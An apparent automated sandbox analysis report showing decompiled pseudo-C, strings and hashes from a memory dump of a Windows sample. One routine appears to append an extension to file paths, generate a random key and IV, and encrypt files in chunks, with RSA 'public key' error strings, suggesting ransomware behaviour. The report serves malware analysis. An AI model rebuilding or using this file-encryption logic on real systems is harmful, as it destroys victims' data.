                    						 *_t143 =  *_t143 & 0x00000000;
                    						__eflags =  *_t143;
                    						 *((intOrPtr*)(E013FDB3A())) = 9;
                    						L59:
                    						_t145 = E013FDA61();
                    						goto L60;
                    					}
                    					__eflags = _t213 -  *0x143a940; // 0x40
                    					if(__eflags >= 0) {
                    						goto L58;
                    					}
                    					_v24 = 1;
                    					_t239 = _t213 >> 6;
                    					_t235 = (_t213 & 0x0000003f) * 0x30;
                    					_v20 = _t239;
                    					_t149 =  *((intOrPtr*)(0x143a740 + _t239 * 4));
                    					_v28 = _t235;
                    					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
                    					_v5 = _t222;
                    					__eflags = _t222 & 0x00000001;
                    					if((_t222 & 0x00000001) == 0) {
                    						goto L58;
                    					}
                    					_t223 = _a12;
                    					__eflags = _t223 - 0x7fffffff;
                    					if(_t223 <= 0x7fffffff) {
                    						__eflags = _t223;
                    						if(_t223 == 0) {
                    							L57:
                    							return 0;
                    						}
                    						__eflags = _v5 & 0x00000002;
                    						if((_v5 & 0x00000002) != 0) {
                    							goto L57;
                    						}
                    						__eflags = _a8;
                    						if(_a8 == 0) {
                    							goto L6;
                    						}
                    						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
                    						_v5 = _t153;
                    						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
                    						_t246 = 0;
                    						_t155 = _t153 - 1;
                    						__eflags = _t155;
                    						if(_t155 == 0) {
                    							_t236 = _v24;
                    							_t157 =  !_t223;
                    							__eflags = _t236 & _t157;
                    							if((_t236 & _t157) != 0) {
                    								_t158 = 4;
                    								_t224 = _t223 >> 1;
                    								_v16 = _t158;
                    								__eflags = _t224 - _t158;
                    								if(_t224 >= _t158) {
                    									_t158 = _t224;
                    									_v16 = _t224;
                    								}
                    								_t246 = E0140131B(_t224, _t158);
                    								E014012E1(0);
                    								E014012E1(0);
                    								_t249 = _t248 + 0xc;
                    								_v12 = _t246;
                    								__eflags = _t246;
                    								if(_t246 != 0) {
                    									_t162 = E01408E19(_t213, 0, 0, _v24);
                    									_t225 =  *((intOrPtr*)(0x143a740 + _t239 * 4));
                    									_t248 = _t249 + 0x10;
                    									_t240 = _v28;
                    									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
                    									_t163 = _t246;
                    									 *(_t240 + _t225 + 0x24) = _t236;
                    									_t235 = _t240;
                    									_t223 = _v16;
                    									L21:
                    									_t241 = 0;
                    									_v40 = _t163;
                    									_t215 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    									_v36 = _t215;
                    									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
                    									_t216 = _a4;
                    									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
                    										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
                    										_v6 = _t218;
                    										__eflags = _t218 - 0xa;
                    										_t216 = _a4;
                    										if(_t218 != 0xa) {
                    											__eflags = _t223;
                    											if(_t223 != 0) {
                    												_t241 = _v24;
                    												 *_t163 = _v6;
                    												_t216 = _a4;
                    												_t232 = _t223 - 1;
                    												__eflags = _v5;
                    												_v12 = _t163 + 1;
                    												_v16 = _t232;
                    												 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2a)) = 0xa;
                    												if(_v5 != 0) {
                    													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2b));
                    													_v6 = _t191;
                    													__eflags = _t191 - 0xa;
                    													if(_t191 != 0xa) {
                    														__eflags = _t232;
                    														if(_t232 != 0) {
                    															_t192 = _v12;
                    															_t241 = 2;
                    															 *_t192 = _v6;
                    															_t216 = _a4;
                    															_t233 = _t232 - 1;
                    															_v12 = _t192 + 1;
                    															_v16 = _t233;
                    															 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2b)) = 0xa;
                    															__eflags = _v5 - _v24;
                    															if(_v5 == _v24) {
                    																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2c));
                    																_v6 = _t199;
                    																__eflags = _t199 - 0xa;
                    																if(_t199 != 0xa) {
                    																	__eflags = _t233;
                    																	if(_t233 != 0) {
                    																		_t200 = _v12;
                    																		_t241 = 3;
                    																		 *_t200 = _v6;
                    																		_t216 = _a4;
                    																		_t234 = _t233 - 1;
                    																		__eflags = _t234;
                    																		_v12 = _t200 + 1;
                    																		_v16 = _t234;
                    																		 *((char*)(_t235 +  *((intOrPtr*)(0x143a740 + _v20 * 4)) + 0x2c)) = 0xa;
                    																	}
                    																}
                    															}
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    									_t164 = E014106A8(_t216);
                    									__eflags = _t164;
                    									if(_t164 == 0) {
                    										L41:
                    										_v24 = 0;
                    										L42:
                    										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0); // executed
                    										__eflags = _t167;
                    										if(_t167 == 0) {
                    											L53:
                    											_t168 = GetLastError();
                    											_t241 = 5;
                    											__eflags = _t168 - _t241;
                    											if(_t168 != _t241) {
                    												__eflags = _t168 - 0x6d;
                    												if(_t168 != 0x6d) {
                    													L37:
                    													E013FDB04(_t168);
                    													goto L38;
                    												}
                    												_t242 = 0;
                    												goto L39;
                    											}
                    											 *((intOrPtr*)(E013FDB3A())) = 9;
                    											 *(E013FDB27()) = _t241;
                    											goto L38;
                    										}
                    										_t229 = _a12;
                    										__eflags = _v36 - _t229;
                    										if(_v36 > _t229) {
                    											goto L53;
                    										}
                    										_t242 = _t241 + _v36;
                    										__eflags = _t242;
                    										L45:
                    										_t237 = _v28;
                    										_t175 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
                    										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
                    											__eflags = _v5 - 2;
                    											if(_v5 == 2) {
                    												__eflags = _v24;
                    												_push(_t242 >> 1);
                    												_push(_v40);
                    												_push(_t216);
                    												if(_v24 == 0) {
                    													_t176 = E0141089A();
                    												} else {
                    													_t176 = E01410BAA();
                    												}
                    											} else {
                    												_t230 = _t229 >> 1;
                    												__eflags = _t229 >> 1;
                    												_t176 = E01410A5A(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
                    											}
                    											_t242 = _t176;
                    										}
                    										goto L39;
                    									}
                    									_t231 = _v28;
                    									_t178 =  *((intOrPtr*)(0x143a740 + _v20 * 4));
                    									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
                    									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
                    										goto L41;
                    									}
                    									_t180 = GetConsoleMode(_v32,  &_v44);
                    									__eflags = _t180;
                    									if(_t180 == 0) {
                    										goto L41;
                    									}
                    									__eflags = _v5 - 2;
                    									if(_v5 != 2) {
                    										goto L42;
                    									}
                    									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
                    									__eflags = _t184;
                    									if(_t184 != 0) {
                    										_t229 = _a12;
                    										_t242 = _t241 + _v36 * 2;
                    										goto L45;
                    									}
                    									_t168 = GetLastError();
                    									goto L37;
                    								} else {
                    									 *((intOrPtr*)(E013FDB3A())) = 0xc;
                    									 *(E013FDB27()) = 8;
                    									L38:
                    									_t242 = _t241 | 0xffffffff;
                    									__eflags = _t242;
                    									L39:
                    									E014012E1(_t246);
                    									return _t242;
                    								}
                    							}
                    							L15:
                    							 *(E013FDB27()) =  *_t206 & _t246;
                    							 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    							E013FDA61();
                    							goto L38;
                    						}
                    						__eflags = _t155 != 1;
                    						if(_t155 != 1) {
                    							L13:
                    							_t163 = _a8;
                    							_v16 = _t223;
                    							_v12 = _t163;
                    							goto L21;
                    						}
                    						_t211 =  !_t223;
                    						__eflags = _t211 & 0x00000001;
                    						if((_t211 & 0x00000001) == 0) {
                    							goto L15;
                    						}
                    						goto L13;
                    					}
                    					L6:
                    					 *(E013FDB27()) =  *_t151 & 0x00000000;
                    					 *((intOrPtr*)(E013FDB3A())) = 0x16;
                    					goto L59;
                    				} else {
                    					 *(E013FDB27()) =  *_t212 & 0x00000000;
                    					_t145 = E013FDB3A();
                    					 *_t145 = 9;
                    					L60:
                    					return _t145 | 0xffffffff;
                    				}
                    			}


                    0x01410e08
                    0x01410e0a
                    0x01410e0c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01410e0c
                    0x01410db8
                    0x01410dbd
                    0x01410dc5
                    0x00000000
                    0x01410d50
                    0x01410d55
                    0x01410d58
                    0x01410d5d
                    0x014110ea
                    0x00000000
                    0x014110ea

                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: abd3f499ce84639333514a57c700b7319f4c9cd9e030fe10ad769bafaea7863b
                    • Instruction ID: 0ae928f6860e6469364cf03f9c77805b3519ce39a06e100241e90249e9e6145a
                    • Opcode Fuzzy Hash: abd3f499ce84639333514a57c700b7319f4c9cd9e030fe10ad769bafaea7863b
                    • Instruction Fuzzy Hash: 4DC1E6B0E0428A9FDF12CFADC844BAEBFB0AF59314F14415AE644A73A5C7749941CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E013E3220(intOrPtr* __ecx) {
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				signed int _t100;
                    				signed int _t101;
                    				void* _t108;
                    				void* _t109;
                    				void* _t111;
                    				intOrPtr* _t112;
                    				intOrPtr* _t116;
                    				void* _t119;
                    				void* _t134;
                    				void* _t139;
                    				void* _t145;
                    				void* _t147;
                    				void* _t149;
                    				void* _t151;
                    				void* _t153;
                    				void* _t155;
                    				void* _t157;
                    				void* _t162;
                    				void* _t164;
                    				intOrPtr* _t169;
                    				intOrPtr* _t173;
                    				signed int _t206;
                    				signed int _t208;
                    				intOrPtr _t222;
                    				void* _t226;
                    				void* _t227;
                    				signed int _t230;
                    				void* _t231;
                    				void* _t233;
                    
                    				_t230 = _t231 - 0xfc;
                    				_push(0xffffffff);
                    				_push(E014175CC);
                    				_push( *[fs:0x0]);
                    				_t233 = _t231 - 0xac;
                    				_t100 =  *0x1435234; // 0x78d9f939
                    				_t101 = _t100 ^ _t230;
                    				 *(_t230 + 0xf8) = _t101;
                    				_push(_t212);
                    				_push(_t101);
                    				 *[fs:0x0] = _t230 - 0xc;
                    				_t169 = __ecx;
                    				 *((intOrPtr*)(_t230 - 0x18)) = __ecx;
                    				_t222 =  *((intOrPtr*)(_t230 + 0x10c));
                    				 *((intOrPtr*)(_t230 - 0x14)) =  *((intOrPtr*)(_t230 + 0x104));
                    				 *((intOrPtr*)(_t230 - 0x24)) =  *((intOrPtr*)(_t230 + 0x108));
                    				 *((intOrPtr*)(_t230 - 0x2c)) =  *((intOrPtr*)(_t230 + 0x110));
                    				 *((intOrPtr*)(_t230 - 0x1c)) =  *((intOrPtr*)(_t230 + 0x114));
                    				 *((intOrPtr*)(_t230 - 0x20)) = _t222;
                    				_t108 =  *((intOrPtr*)( *__ecx + 0x14))();
                    				_t173 = __ecx;
                    				if(_t222 > _t108) {
                    					_t139 =  *((intOrPtr*)( *__ecx + 0x14))();
                    					_t243 = _t139 - 1;
                    					if(_t139 < 1) {
                    						_push(_t230 + 0xe0);
                    						_t162 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 8))();
                    						 *((intOrPtr*)(_t230 - 4)) = 0;
                    						_t164 = E013C1DF7(__ecx, __ecx + 4, _t230 + 0xe0, _t230 + 0xc8, _t162, ": this key is too short to encrypt any messages");
                    						_t233 = _t233 + 0xc;
                    						 *((char*)(_t230 - 4)) = 1;
                    						E013CB190(_t164);
                    						E013F4EC6(_t230 + 0xa0, 0x1430adc);
                    					}
                    					_t212 = E013E9DA0(_t230 + 0xc8,  *((intOrPtr*)( *_t169 + 0x14))(), 0xa);
                    					 *((intOrPtr*)(_t230 - 4)) = 2;
                    					_t145 = E013E9DA0(_t230 + 0xe0, _t222, 0xa);
                    					_t210 =  *((intOrPtr*)(_t169 + 4));
                    					_t199 = _t169 + 4;
                    					 *((char*)(_t230 - 4)) = 3;
                    					_t147 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 4)) + 8))(_t230 + 0x60);
                    					 *((char*)(_t230 - 4)) = 4;
                    					_t149 = E013C1DF7(_t169, _t169 + 4,  *((intOrPtr*)(_t169 + 4)), _t230 + 0x48, _t147, ": message length of ");
                    					 *((char*)(_t230 - 4)) = 5;
                    					_t151 = E013C1DA9(_t169, _t169 + 4, _t143, _t230 + 0x30, _t149, _t145);
                    					 *((char*)(_t230 - 4)) = 6;
                    					_t153 = E013C1DF7(_t169, _t169 + 4,  *((intOrPtr*)(_t169 + 4)), _t230 + 0x18, _t151, " exceeds the maximum of ");
                    					 *((char*)(_t230 - 4)) = 7;
                    					_t155 = E013C1DA9(_t169, _t169 + 4, _t143, _t230, _t153, _t143);
                    					 *((char*)(_t230 - 4)) = 8;
                    					_t157 = E013C1DF7(_t169, _t199, _t210, _t230 + 0xb0, _t155, " for this public key");
                    					_t233 = _t233 + 0x54;
                    					_t173 = _t230 + 0x78;
                    					 *((char*)(_t230 - 4)) = 9;
                    					E013CB190(_t157);
                    					E013F4EC6(_t230 + 0x78, 0x1430adc);
                    				}
                    				_t109 = E013C50E6(_t173, _t243);
                    				 *((intOrPtr*)(_t230 + 0xec)) = 0xffffffff;
                    				_t111 = _t109 + 7 >> 3;
                    				 *(_t230 - 0x28) = _t111;
                    				 *(_t230 + 0xf0) = _t111;
                    				_t244 = _t111;
                    				if(_t111 != 0) {
                    					_t111 = E013CD9F0(_t173, _t212, _t244, _t111);
                    					_t233 = _t233 + 4;
                    				}
                    				 *(_t230 - 0x10) = _t111;
                    				 *(_t230 + 0xf4) = _t111;
                    				 *((intOrPtr*)(_t230 - 4)) = 0xc;
                    				_t112 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 8)) + 0xc))();
                    				 *((intOrPtr*)( *_t112 + 0xc))( *((intOrPtr*)(_t230 - 0x14)),  *((intOrPtr*)(_t230 - 0x24)),  *((intOrPtr*)(_t230 - 0x20)),  *(_t230 - 0x10), E013C50E6( *((intOrPtr*)(_t230 - 0x18)), _t244),  *((intOrPtr*)(_t230 - 0x1c)));
                    				_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t169 + 8)) + 8))();
                    				 *((char*)(_t230 - 4)) = 0xd;
                    				_t119 =  *((intOrPtr*)( *_t116 + 0x14))(_t230 - 0x44,  *((intOrPtr*)(_t230 - 0x14)), E013D2270(_t230 - 0x5c,  *((intOrPtr*)(_t169 + 8)),  *(_t230 - 0x10),  *(_t230 - 0x28), 0, 1));
                    				 *((char*)(_t230 - 4)) = 0xe;
                    				E013D6D90(_t119, _t244,  *((intOrPtr*)(_t230 - 0x2c)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t230 - 0x18)))) + 0x10))(), 0);
                    				_t226 =  *(_t230 - 0x34);
                    				_t183 =  >=  ? _t230 - 0x38 : _t230 - 0x3c;
                    				 *((char*)(_t230 - 4)) = 0xf;
                    				_push(_t226);
                    				_t206 =  *( >=  ? _t230 - 0x38 : _t230 - 0x3c);
                    				memset(_t226, 0, _t206 << 2);
                    				if(_t206 == 0) {
                    					L013CDA60();
                    				} else {
                    					E013CD9E0();
                    				}
                    				_t227 =  *(_t230 - 0x4c);
                    				_t187 =  >=  ? _t230 - 0x50 : _t230 - 0x54;
                    				 *((char*)(_t230 - 4)) = 0x10;
                    				_push(_t227);
                    				_t208 =  *( >=  ? _t230 - 0x50 : _t230 - 0x54);
                    				memset(_t227, 0, _t208 << 2);
                    				if(_t208 == 0) {
                    					L013CDA60();
                    				} else {
                    					E013CD9E0();
                    				}
                    				 *((intOrPtr*)(_t230 - 4)) = 0x11;
                    				_t191 =  <=  ? _t230 + 0xf0 : _t230 + 0xec;
                    				_t192 =  *( <=  ? _t230 + 0xf0 : _t230 + 0xec);
                    				memset( *(_t230 - 0x10), 0,  *( <=  ? _t230 + 0xf0 : _t230 + 0xec) << 0);
                    				_t134 = L013CDA60( *(_t230 - 0x10));
                    				 *[fs:0x0] =  *((intOrPtr*)(_t230 - 0xc));
                    				return E013F268B(_t134,  *(_t230 + 0xf8) ^ _t230);
                    			}

                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E32EC
                      • Part of subcall function 013F4EC6: RaiseException.KERNEL32(?,?,013F0FA0,00000010,00000010,?,?,?,?,?,?,013F0FA0,00000010,01433568,?,00000010), ref: 013F4F25
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 013E33A8
                    Strings
                    • : this key is too short to encrypt any messages, xrefs: 013E32B4
                    • for this public key, xrefs: 013E3379
                    • exceeds the maximum of , xrefs: 013E3357
                    • : message length of , xrefs: 013E3335
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw$ExceptionRaise
                    • String ID: exceeds the maximum of $ for this public key$: message length of $: this key is too short to encrypt any messages
                    • API String ID: 3476068407-412673420
                    • Opcode ID: 01e552f13144a887e425fde9d643cea0f3696ef6503d4489367dce9956894b8c
                    • Instruction ID: 7dbbdfbcf0c72c25e37459fc5b4379c556a2731abdb4d1661b47806598f3f833
                    • Opcode Fuzzy Hash: 01e552f13144a887e425fde9d643cea0f3696ef6503d4489367dce9956894b8c
                    • Instruction Fuzzy Hash: 5FA1527590024ADFDF21DFA8C844FEEBBB9BF58314F148159E809A7251DB719A04CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013C67F8(void* __ecx, signed int __edx) {
                    				intOrPtr _v8;
                    				char _v16;
                    				char _v24;
                    				signed int _v28;
                    				signed int _v40;
                    				char _v56;
                    				char _v72;
                    				short _v4172;
                    				intOrPtr _v4176;
                    				signed int _v4180;
                    				char _v4196;
                    				intOrPtr _v4200;
                    				signed int _v4204;
                    				char _v4220;
                    				intOrPtr _v4224;
                    				char _v4244;
                    				intOrPtr _v4248;
                    				char _v4268;
                    				intOrPtr _v4360;
                    				char _v4444;
                    				signed int _v4452;
                    				char _v4460;
                    				char _v4808;
                    				char _v4812;
                    				char _v4813;
                    				signed int _v4820;
                    				signed int _v4824;
                    				signed int _v4828;
                    				signed int _v4832;
                    				signed int _v4836;
                    				intOrPtr _v4840;
                    				intOrPtr _v4844;
                    				signed int _v4848;
                    				signed int _v4852;
                    				intOrPtr _v4856;
                    				long long _v4860;
                    				signed int _v4864;
                    				signed int _v4868;
                    				signed int _v4872;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t148;
                    				signed int _t149;
                    				intOrPtr _t151;
                    				void* _t184;
                    				signed int _t189;
                    				signed int _t208;
                    				intOrPtr _t220;
                    				signed int _t229;
                    				void* _t244;
                    				signed int _t260;
                    				signed int _t264;
                    				signed int _t272;
                    				signed int _t273;
                    				intOrPtr _t275;
                    				signed int _t278;
                    				intOrPtr _t281;
                    				signed int _t285;
                    				signed int _t286;
                    				void* _t287;
                    				intOrPtr _t288;
                    				signed int _t290;
                    				signed int _t294;
                    				signed int _t296;
                    				signed int _t298;
                    				void* _t301;
                    				void* _t302;
                    				void* _t304;
                    				long long* _t305;
                    				intOrPtr _t307;
                    				signed int _t312;
                    				intOrPtr _t314;
                    				void* _t322;
                    
                    				_t272 = __edx;
                    				_t229 = _t296;
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t298 = (_t296 & 0xfffffff8) + 4;
                    				_v8 =  *((intOrPtr*)(_t229 + 4));
                    				_t294 = _t298;
                    				_push(0xffffffff);
                    				_push(E01415DA7);
                    				_push( *[fs:0x0]);
                    				_push(__ecx);
                    				_push(_t229);
                    				_push(__ecx);
                    				E013F2860();
                    				_t148 =  *0x1435234; // 0x78d9f939
                    				_t149 = _t148 ^ _t294;
                    				_v40 = _t149;
                    				_push(_t149);
                    				 *[fs:0x0] =  &_v24;
                    				_v28 = _t298;
                    				_t151 =  *((intOrPtr*)(_t229 + 0x10));
                    				_t275 =  *((intOrPtr*)(_t229 + 0xc));
                    				_t281 =  *((intOrPtr*)(_t229 + 8));
                    				_v4844 = _t275;
                    				_v4840 = _t151;
                    				_t307 = _t151;
                    				if(_t307 >= 0 && (_t307 > 0 || _t275 > 0x400)) {
                    					E013F5890(_t275,  &_v4172, 0, 0x1000);
                    					wsprintfW( &_v4172, L"%s%s", _t281,  *0x1435000);
                    					_t151 = E013FEB5D(_t281,  &_v4172); // executed
                    					_t301 = _t298 + 0x24;
                    					_t309 = _t151;
                    					if(_t151 == 0) {
                    						E013CBEF0(0x1438790,  &_v72, 0x10);
                    						E013CBEF0(0x1438790,  &_v56, 0x10);
                    						_v4204 = _v4204 & 0x00000000;
                    						_v4200 = 0xf;
                    						_v4220 = 0;
                    						E013C64B7( &_v4220, _t309,  &_v72, 0x10);
                    						_v16 = 0;
                    						_t165 =  >=  ? _v4220 :  &_v4220;
                    						_t302 = _t301 - 0x18;
                    						E013C2AD0(_t302,  >=  ? _v4220 :  &_v4220);
                    						E013C7B97(_t275);
                    						_v4180 = _v4180 & 0;
                    						_v16 = 1;
                    						_v4176 = 0xf;
                    						_v4196 = 0;
                    						E013C64B7( &_v4196, _v4200 - 0x10,  &_v56, 0x10);
                    						_v16 = 2;
                    						_t172 =  >=  ? _v4196 :  &_v4196;
                    						_t304 = _t302 + 0x1c - 0x18;
                    						E013C2AD0(_t304,  >=  ? _v4196 :  &_v4196);
                    						E013C7B97(_t275);
                    						_v16 = 3;
                    						E013F5890(_t275,  &_v4812, 0, 0x160);
                    						_t305 = _t304 + 0x28;
                    						E013C2572( &_v4812);
                    						_v16 = 4;
                    						E013CCBB0( &_v4812, _v4176 - 0x10,  &_v72, 0x10,  &_v56,  *((intOrPtr*)(_v4812 + 0x20))( &_v4244,  &_v4268));
                    						_t184 = E013F2770(_t275,  *((intOrPtr*)(_t229 + 0x10)), 0x64, 0);
                    						_t312 = _t272;
                    						if(_t312 < 0) {
                    							L8:
                    							_t244 = E013F2770(_t184, _t272, 0x400, 0);
                    							E013F2CA0(_t185, _t244);
                    							asm("movsd [ebp-0x12f0], xmm0");
                    							_push(_t244);
                    							_push(_t244);
                    							 *_t305 = _v4860;
                    							E013FEB90();
                    							_t285 = E013F28D0();
                    							_t189 = _t272;
                    							__eflags = _t285 | _t189;
                    							if((_t285 | _t189) == 0) {
                    								_t285 = 1;
                    								_t189 = 0;
                    								__eflags = 0;
                    							}
                    							_t286 = _t285 << 0xa;
                    							__eflags = _t286;
                    							_v4836 = (_t189 << 0x00000020 | _t285) << 0xa;
                    							_v4828 = _t286;
                    						} else {
                    							_t286 = 0x5f5e000;
                    							_v4828 = 0x5f5e000;
                    							if(_t312 > 0 || _t184 > 0x5f5e000) {
                    								_v4836 = _v4836 & 0x00000000;
                    							} else {
                    								goto L8;
                    							}
                    						}
                    						_t314 =  *((intOrPtr*)(_t229 + 0x10));
                    						if(_t314 > 0) {
                    							L15:
                    							_v4848 = 0xa;
                    						} else {
                    							if(_t314 < 0) {
                    								L14:
                    								_v4848 = 1;
                    							} else {
                    								_t315 = _t275 - 0x989680;
                    								if(_t275 >= 0x989680) {
                    									goto L15;
                    								} else {
                    									goto L14;
                    								}
                    							}
                    						}
                    						_v4813 = 0;
                    						asm("stosd");
                    						asm("stosd");
                    						asm("stosd");
                    						_v4872 = _v4872 & 0x00000000;
                    						_v4868 = _v4868 & 0x00000000;
                    						_v4864 = _v4864 & 0x00000000;
                    						E013C58F2( &_v4872, _t315, _t286,  &_v4813); // executed
                    						_v4820 = _t286;
                    						_t287 = 0;
                    						_v16 = 5;
                    						_v4832 = _v4836;
                    						E013C82C3( &_v4872, 0);
                    						E013F5890( &_v4872,  &_v4460, 0, 0xc0);
                    						_push(1);
                    						E013C28D3( &_v4460);
                    						_v16 = 6;
                    						E013C71BF( &_v4460, _t272, _t315,  &_v4172, 0x23, 0x40); // executed
                    						if(_v4360 != 0) {
                    							_t278 = _v4828;
                    							_t260 = 0;
                    							_v4824 = _v4824 & 0;
                    							_t208 = 0;
                    							_t288 =  *((intOrPtr*)(_t229 + 0xc));
                    							_v16 = 7;
                    							while(1) {
                    								_v4852 = _t260;
                    								if(_t208 >= 0x64) {
                    									break;
                    								}
                    								if(_t260 >= 0 && _t260 < 0x64) {
                    									asm("cdq");
                    									_t273 = _t260 % _v4848;
                    									if(_t273 == 0) {
                    										_t322 = _v4840 - _v4836;
                    										if(_t322 >= 0) {
                    											if(_t322 > 0) {
                    												L25:
                    												asm("cdq");
                    												_t220 = E013F2820(_t260, _t273, _v4820, _v4832);
                    												_t264 = _t273;
                    												_v4856 = _t220;
                    												_v4828 = _t264;
                    												_push(0);
                    												_push(_t264);
                    												_push(_t220);
                    												E013C7E38( &_v4460); // executed
                    												_push(0);
                    												_t290 = _v4872;
                    												_push(_v4868 - _v4872);
                    												_push(_t290);
                    												E013C74F4( &_v4460); // executed
                    												_v4832 = _v4832 & 0x00000000;
                    												_push(0);
                    												_push(_v4828);
                    												_v4820 = _v4452;
                    												_push(_v4856);
                    												E013C8014( &_v4444, _t323); // executed
                    												_push(_v4820);
                    												_push(_t290);
                    												_push(_t290);
                    												E013EA5D0( &_v4808);
                    												_push(_v4832);
                    												_push(_v4820);
                    												_push(_t290); // executed
                    												E013C853F( &_v4444, _t323); // executed
                    												_v4844 = _v4844 - _v4820;
                    												asm("sbb [ebp-0x12dc], eax");
                    												_t260 = _v4852;
                    												_t288 = _v4844;
                    											} else {
                    												_t323 = _t288 - _t278;
                    												if(_t288 > _t278) {
                    													goto L25;
                    												}
                    											}
                    										}
                    									}
                    									_t208 = _v4824;
                    								}
                    								_t260 = _t260 + 1;
                    								_t208 = _t208 + 1;
                    								_v4824 = _t208;
                    							}
                    							_push(2);
                    							_push(0);
                    							_push(0);
                    							E013C8014( &_v4444, __eflags); // executed
                    							__eflags = _v4248 - 0x10;
                    							_t211 =  >=  ? _v4268 :  &_v4268;
                    							_t287 = 0;
                    							_push(0);
                    							_push(0x400);
                    							_push( >=  ? _v4268 :  &_v4268);
                    							E013C853F( &_v4444, _v4248 - 0x10);
                    							__eflags = _v4224 - 0x10;
                    							_push(0);
                    							_t214 =  >=  ? _v4244 :  &_v4244;
                    							_push(0x400);
                    							_push( >=  ? _v4244 :  &_v4244);
                    							E013C853F( &_v4444, __eflags);
                    							_v16 = 6;
                    						}
                    						E013C65F9( &_v4460, __eflags);
                    						E013C4020( &_v4460);
                    						E013C6197( &_v4872);
                    						E013C38DE( &_v4812, _t287, __eflags);
                    						E013C6118( &_v4244, 1, _t287);
                    						E013C6118( &_v4196, 1, _t287);
                    						E013C6118( &_v4268, 1, _t287);
                    						_t151 = E013C6118( &_v4220, 1, _t287);
                    					}
                    				}
                    				 *[fs:0x0] = _v24;
                    				__eflags = _v40 ^ _t294;
                    				return E013F268B(_t151, _v40 ^ _t294);
                    			}
                    0x013c6a12
                    0x013c6a20
                    0x013c6a21
                    0x013c6a22
                    0x013c6a25
                    0x013c6a31
                    0x013c6a33
                    0x013c6a37
                    0x013c6a39
                    0x013c6a3d
                    0x013c6a3e
                    0x013c6a3e
                    0x013c6a3e
                    0x013c6a44
                    0x013c6a44
                    0x013c6a47
                    0x013c6a4d
                    0x013c69e3
                    0x013c69e3
                    0x013c69e8
                    0x013c69ee
                    0x013c69f4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c69ee
                    0x013c6a53
                    0x013c6a57
                    0x013c6a6f
                    0x013c6a6f
                    0x013c6a59
                    0x013c6a59
                    0x013c6a63
                    0x013c6a63
                    0x013c6a5b
                    0x013c6a5b
                    0x013c6a61
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x013c6a61
                    0x013c6a59
                    0x013c6a7b
                    0x013c6a88
                    0x013c6a8f
                    0x013c6a90
                    0x013c6a97
                    0x013c6a9e
                    0x013c6aa5
                    0x013c6aae
                    0x013c6ab9
                    0x013c6abf
                    0x013c6ac2
                    0x013c6ac6
                    0x013c6acc
                    0x013c6ade
                    0x013c6aec
                    0x013c6aee
                    0x013c6afd
                    0x013c6b08
                    0x013c6b13
                    0x013c6b19
                    0x013c6b1f
                    0x013c6b21
                    0x013c6b27
                    0x013c6b29
                    0x013c6b2c
